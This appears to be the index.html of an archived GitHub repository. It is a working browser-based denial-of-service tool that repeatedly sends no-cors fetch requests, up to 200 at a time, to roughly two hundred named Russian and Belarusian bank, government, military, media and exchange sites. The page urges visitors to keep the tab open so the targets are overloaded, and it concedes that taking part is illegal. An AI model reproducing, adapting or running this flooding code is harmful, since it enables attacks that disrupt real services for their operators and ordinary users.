This repository has been archived by the owner on Aug 23, 2022. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 58
/
index.html
476 lines (443 loc) · 18 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Russia and Belarus HTML DoS</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet"
integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.min.js"
integrity="sha384-QJHtvGhmr9XOIpI6YVutG+2QOK9T+ZnN4kzFN1RtK3zEFEIsxhlmWl5/YESvpZ13"
crossorigin="anonymous"></script>
<style>
body {
padding: 0;
margin: 0;
font-family: Arial, sans-serif;
background-color: #FFD600;
}
.title {
margin: 3rem auto 3rem auto;
text-align: center;
color: #005BBC;
}
.intro .howto {
background-color: #005BBC;
}
.intro .howto h3 {
color: #FFD600;
text-align: center;
margin-top: 1rem;
}
.intro .howto p {
color: white;
text-align: justify;
}
.footer {
color: #005BBC;
text-align: center;
margin-top: 2rem;
}
.desc{
color:black;
padding-top: 2rem;
padding-bottom: 2rem;
margin: 0 auto;
width: 60%;
}
.desc h3 {
text-align: center;
color: #005BBC;
}
#stats h4 {
font-size: 1.1em;
text-decoration: underline;
color: #005BBC;
font-weight: 400;
}
table.status {
margin-bottom: 10px;
}
</style>
</head>
<body>
<div class="modal" id="exampleModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true" data-bs-backdrop="static" data-bs-keyboard="false">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalLabel">Warning!</h5>
</div>
<div class="modal-body">
<p>The action of DoSing or participating in DDoS is still illegal. Click on continue if you wish to support Ukraine in taking down Russian and Belarussian propaganda news, government, military and banking sites.</p>
<hr>
<p>Дія DoSing або участь у DDoS все ще є незаконними. Натисніть «Продовжити», якщо ви хочете підтримати Україну у знищенні російських та білоруських пропагандистських новин, урядових, військових та банківських сайтів.</p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" onclick="window.location.href='https://www.google.com'">Leave</button>
<button type="button" class="btn btn-primary" data-dismiss="exampleModalLabel" onclick="togglePause(); myModal.toggle();">Continue</button>
</div>
</div>
</div>
</div>
<h1 class="title">Russia and Belarus HTML DoS</h1>
<div class="intro container">
<div class="row">
<div class="howto col-lg-4 col-sm-12">
<h3>English version</h3>
<p>For security concerns, you are able to simply save the webpage, and run locally - as well as
view the
source. It
is
entirely HTML and browser interpreted.</p>
<p>The "official" news in russian federation and belarus are all fake and we believe it is
better to shut
them down! The government sites and banks are also taking a hit!</p>
<p>Please, just open this page and let it be open on your devices, it will flood the web-sites
and pose a
huge load
on
their infrastructure</p>
</div>
<div class="howto col-lg-4 col-sm-12">
<h3>Русская версия</h3>
<p>"Официальные" новости в рф - это театр абсурда и мы считаем, что это нужно остановить!</p>
<p>Пожалуйста, просто откройте эту страницу на своём компьютере и оставтье вкладку открытой, она
будет
автоматически
нагружать сайты российской пропаганды.</p>
</div>
<div class="howto col-lg-4 col-sm-12">
<h3>Українська версія</h3>
<p>Офіційні новини в рф - це театр абсурду і ми вважаємо, що це треба зупинити!</p>
<p>Будь ласка, просто залиште відкритою цю сторінку на своєму комп'ютері щоб вона автоматично
навантажувала
сайти
російської пропаганди.</p>
</div>
</div>
</div>
<div class="desc text-center">
<h3>Session Status</h3>
<p>The number of GET requests and error responses for each targeted website is shown below. Failure to fetch is normal! That means their servers are overloaded and dropping
packets - which is the goal!</p>
<p>Total number of requests: <span id="totalrequests">0</span></p>
<p>Total number of errors: <span id="totalerrors">0</span></p>
<button type="button" class="btn btn-primary" onclick="togglePause();">Resume</button>
</div>
<div id="stats" class="container">
<div class="row">
</div>
</div>
<p class="footer">Reformated from https://stop-russian-desinformation.near.page</p>
<script>
// target list
var urls = [
'https://absolutbank.ru/',
'https://www.avangard.ru/rus/',
'https://www.avtogradbank.ru/',
'https://www.autokreditbank.ru/',
'https://www.agroros.ru/',
'https://ai-bank.ru/',
'https://www.ak-bars.ru/',
'https://www.aksonbank.ru/',
'https://www.aktivbank.ru/',
'https://www.akcia-bank.ru/',
'https://www.alexbank.ru/',
'https://www.alefbank.ru/',
'https://albank.ru/ru/',
'https://altbb.ru/',
'https://capitalbank.ru/',
'https://alfabank.com/',
'https://www.atb.su/',
'https://www.andjibank.ru/',
'https://www.mfk-bank.ru/',
'https://www.aresbank.ru/',
'https://bank-arzamas.ru/',
'https://www.aspectbank.ru/',
'https://assotsiatsiyabank.ru/',
'https://baikalrosbank.ru/',
'https://byrich.ru/',
'https://norvikbank.ru',
'https://www.zemsky.ru/',
'https://www.unicreditbank.ru',
'https://www.open.ru/',
'https://www.raiffeisen.ru/',
'https://abr.ru/',
'https://ria.ru',
'https://gazeta.ru',
'https://kp.ru',
'https://riafan.ru',
'https://pikabu.ru',
'https://kommersant.ru',
'https://mk.ru',
'https://yaplakal.com',
'https://rbc.ru',
'https://bezformata.com',
'https://gazprom.ru',
'https://lukoil.ru',
'https://magnit.ru',
'https://nornickel.com',
'https://surgutneftegas.ru',
'https://tatneft.ru',
'https://evraz.com/ru/',
'https://nlmk.com',
'https://sibur.ru',
'https://severstal.com',
'https://metalloinvest.com',
'https://nangs.org',
'https://rmk-group.ru/ru/',
'https://tmk-group.ru',
'https://ya.ru',
'https://polymetalinternational.com/ru/',
'https://uralkali.com/ru/',
'https://eurosib.ru',
'https://omk.ru',
'https://gosuslugi.ru',
'https://mos.ru/',
'https://kremlin.ru',
'https://government.ru',
'https://mil.ru',
'https://nalog.gov.ru',
'https://customs.gov.ru',
'https://pfr.gov.ru',
'https://rkn.gov.ru',
'https://lenta.ru',
'https://www.rt.com/',
'https://smotrim.ru/',
'https://tvzvezda.ru/',
'https://vsoloviev.ru/',
'https://www.vesti.ru/',
'https://online.sberbank.ru/',
'https://iz.ru',
'https://ukraina.ru',
'https://www.sberbank.ru',
'https://www.vtb.ru',
'https://www.gazprombank.ru',
'https://newletters.kremlin.ru/',
'https:s//20.kremlin.ru/',
'https://constitution.kremlin.ru',
'https://belta.by',
'https://www.ctv.by',
'https://belarus24.by',
'https://alfaradio.by',
'https://www.kgb.by',
'https://sputnik.by',
'https://rec.gov.by',
'https://radiomir.by/',
'https://radiostalica.by/',
'https://radiobrestfm.by/',
'https://www.tvrmogilev.by/',
'https://minsknews.by/',
'https://zarya.by/',
'https://grodnonews.by/',
'https://www.tvr.by/',
'https://brrb.by/',
'https://www.belapb.by/',
'https://bankdabrabyt.by/',
'https://mail.rkn.gov.ru/',
'https://cloud.rkn.gov.ru',
'https://mvd.gov.ru',
'https://pwd.wto.economy.gov.ru/',
'https://stroi.gov.ru/',
'https://proverki.gov.ru/',
'https://ont.by',
'https://nbrb.by',
'https://bgb.by',
'https://belres.by',
'https://energo.by',
'http://www.bellegprom.by',
'https://www.belneftekhim.by',
'https://shop-rt.com',
'https://sb.by',
'https://belarusbank.by',
'https://belarus.by',
'https://belmarket.by',
'https://mil.by',
'https://president.gov.by',
'https://cleanbtc.ru/',
'https://bonkypay.com/',
'https://changer.club/',
'https://superchange.net',
'https://mine.exchange/',
'https://platov.co',
'https://ww-pay.net/',
'https://delets.cash/',
'https://betatransfer.org',
'https://ramon.money/',
'https://coinpaymaster.com/',
'https://bitokk.biz/',
'https://www.netex24.net',
'https://cashbank.pro/',
'https://flashobmen.com/',
'https://abcobmen.com/',
'https://ychanger.net/',
'https://multichange.net/',
'https://24paybank.ne',
'https://royal.cash/',
'https://prostocash.com/',
'https://baksman.org/',
'https://kupibit.me/',
'https://abcobmen.com',
'https://fsb.ru',
'https://mcs.mail.ru',
'https://roe.ru',
'https://1tv.ru',
'https://tass.ru',
'https://relcom.ru',
'https://gosuslugi41.ru',
'https://uslugi27.ru',
'https://gosuslugi29.ru',
'https://gosuslugi.astrobl.ru',
'https://prokuratura.gov.by',
'https://rusvesna.su/',
'https://oac.gov.by/',
'https://bisr.gov.by/',
'https://www.mpt.gov.by/',
'https://www.mfa.gov.by',
'https://www.mininform.gov.by',
'https://mintrans.gov.by/',
'https://iecp.ru/ep/ep-verification',
'https://iecp.ru/ep/uc-list',
'https://uc-osnovanie.ru/',
'https://www.nucrf.ru/',
'https://www.belinfonalog.ru',
'https://www.roseltorg.ru',
'https://www.astralnalog.ru',
'https://www.nwudc.ru',
'https://www.center-inform.ru',
'https://kk.bank/UdTs',
'https://structure.mil.ru/structure/uc/info.htm',
'https://www.ucpir.ru',
'https://dreamkas.ru',
'https://www.e-portal.ru',
'https://izhtender.ru',
'https://imctax.parus-s.ru',
'https://www.icentr.ru',
'https://www.kartoteka.ru',
'https://rsbis.ru/elektronnaya-podpis',
'https://www.stv-it.ru',
'https://www.crypset.ru',
'https://www.kt-69.ru',
'https://www.24ecp.ru',
'https://kraskript.com',
'https://ca.ntssoft.ru',
'https://www.y-center.ru',
'https://www.rcarus.ru',
'https://rk72.ru',
'https://squaretrade.ru',
'https://ca.gisca.ru',
'https://www.otchet-online.ru',
'https://udcs.ru',
'https://www.cit-ufa.ru',
'https://elkursk.ru',
'https://www.icvibor.ru',
'https://ucestp.ru',
'https://mcspro.ru',
'https://www.infotrust.ru',
'https://epnow.ru',
'https://ca.kamgov.ru',
'https://mascom-it.ru',
'https://cfmc.ru',
'https://rttv.com/'
];
// initialize variables
var targets = urls.reduce((o, key) => ({ ...o, [key]: {number_of_requests: 0, number_of_errored_responses: 0}}), {})
var statRow = document.querySelector("#stats > .row");
var myModal = new bootstrap.Modal(document.getElementById('exampleModal'), {});
var CONCURRENCY_LIMIT = 200;
var queue = [];
var attack = false;
var totalrequests = 0;
var totalerrors = 0;
function togglePause () {
if (attack) {
attack = false;
document.querySelector("div.desc .btn").innerText = "Resume";
} else {
attack = true;
document.querySelector("div.desc .btn").innerText = "Pause";
for (var i=0; i<urls.length; i++) {
flood(i);
}
}
}
async function fetchWithTimeout(resource, options) {
const controller = new AbortController();
const id = setTimeout(() => controller.abort(), options.timeout);
return fetch(resource, {
signal: controller.signal,
mode: 'no-cors'
}).then((response) => {
clearTimeout(id);
return response;
}).catch((error) => {
clearTimeout(id);
throw error;
});
}
async function sleep(ms) {
return new Promise(r => setTimeout(r, ms));
}
async function flood(n) {
const url = urls[n];
const target = targets[url];
while (attack) {
if (queue.length > CONCURRENCY_LIMIT) {
await queue.shift();
}
queue.push(
fetchWithTimeout(url, { timeout: 2000 })
.catch((error) => {
if (error.code === 20 /* ABORT */) {
return;
}
target.number_of_errored_responses++;
target.error_message = error.message;
totalerrors++;
})
.then((response) => {
if (response && !response.ok) {
target.number_of_errored_responses++;
target.error_message = response.statusText;
totalerrors++;
}
target.number_of_requests++;
})
.finally(() => updateTargetDisplay(n))
);
await sleep(1);
}
}
// Update data for target n
function updateTargetDisplay(n) {
var url = urls[n];
var {number_of_requests, number_of_errored_responses} = targets[url];
var requests_cell = document.querySelector(`#target${n} .requests`);
var errors_cell = document.querySelector(`#target${n} .errors`);
requests_cell.innerText = number_of_requests;
errors_cell.innerText = number_of_errored_responses;
document.querySelector("#totalrequests").innerText = totalrequests;
document.querySelector("#totalerrors").innerText = totalerrors;
}
// Shuffle array order before starting
for (let i = urls.length - 1; i > 0; i--) {
const j = Math.floor(Math.random() * (i + 1));
[urls[i], urls[j]] = [urls[j], urls[i]];
}
// Create div for each target
for (var i=0; i<urls.length; i++) {
statRow.innerHTML += `
<div class="col-lg-3 col-md-4 col-sm-6" id="target${i}">
<h4>${urls[i]}</h4>
<table class='status'>
<tr><td>requests:</td><td class="requests">0</td></tr>
</tr><td>errors:</td><td class="errors">0</td></tr>
</table>
</div>
`;
}
// Show warning window
myModal.toggle();
</script>
</body>
</html>